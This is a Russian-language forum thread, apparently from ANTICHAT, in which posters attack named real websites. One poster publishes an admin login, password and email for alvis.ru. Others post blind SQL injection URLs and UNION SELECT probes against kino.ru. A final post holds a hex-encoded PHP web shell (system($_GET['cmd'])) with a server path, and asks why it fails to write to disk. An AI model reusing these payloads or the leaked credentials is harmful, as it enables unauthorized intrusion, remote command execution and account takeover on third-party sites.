ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ребята, кароце я все понял про alvis.ru:
админ иногда вирубивает доступ к alvis.ru/admin
и поетому иногда не получаетса туда попасть..
а вот и сам админ:
pwd = shb09789
login = www
mail = webmaster@alvis.ru

проблему с сайтом решено !!

СПАСИБО всем кто мне дал помощ =)

и ето опять я =)
вот ещо один сайт kino.ru
вроде SQL есть..
http://kino.ru/cinema.php?id=152' но при етом ошибка не появляетса
http://kino.ru/cinema.php?id=152+AND+1=1/* все ок!
http://kino.ru/cinema.php?id=152+AND+1=2/* пусто!
я думаю ето SQL инекция =)
но, я уже и substring и union select 1,...../* пробовал,
но при етих запросах никак немогу понят, ответ GOOD или нет=)

По-моему, ты ошибся. При всех запросах выводится одно и то же. Поищи скулю в "поиске" =)

Собствено такой вопрос Sql выдает пароль, и логин но в админку незаходит.
вот пример:
А вот сама админка:
Собствено что можно зделать?

Возможно стоит блок по ай-пи. То есть в админку может заходить только с ай-пи 75.125.150.120 - к примеру.

xWhitex: ну или (так как у меня с alvis.ru било) просто вход в админку иногда вирубивають =(

Эмм, ну вобщето ты получил пасс от самой базы данных, а не пасс от админки

Здрастье =)
у меня вопрос:
+select+1,2,3,4,5,6,7,8,9/*
Вот скуля,принтабельное поле - 7

J\Очень интересно выводиться версия,можно ли вывести данные кроме version()???
Заранее спасибо

скорее всего нет,я думаю,там стоит ограничение по типу данных и по длине...

а у меня такой вопрос:
почему не проходит конструкция ?
0x3c3f2073797374656d28245f4745545b27636d64275d293b 203f3e - <? system($_GET['cmd']); ?>
0x2f7661722f7777772f666f72756d2f7368656c6c2e706870 - установочная дирректория /var/www/forum/shell.php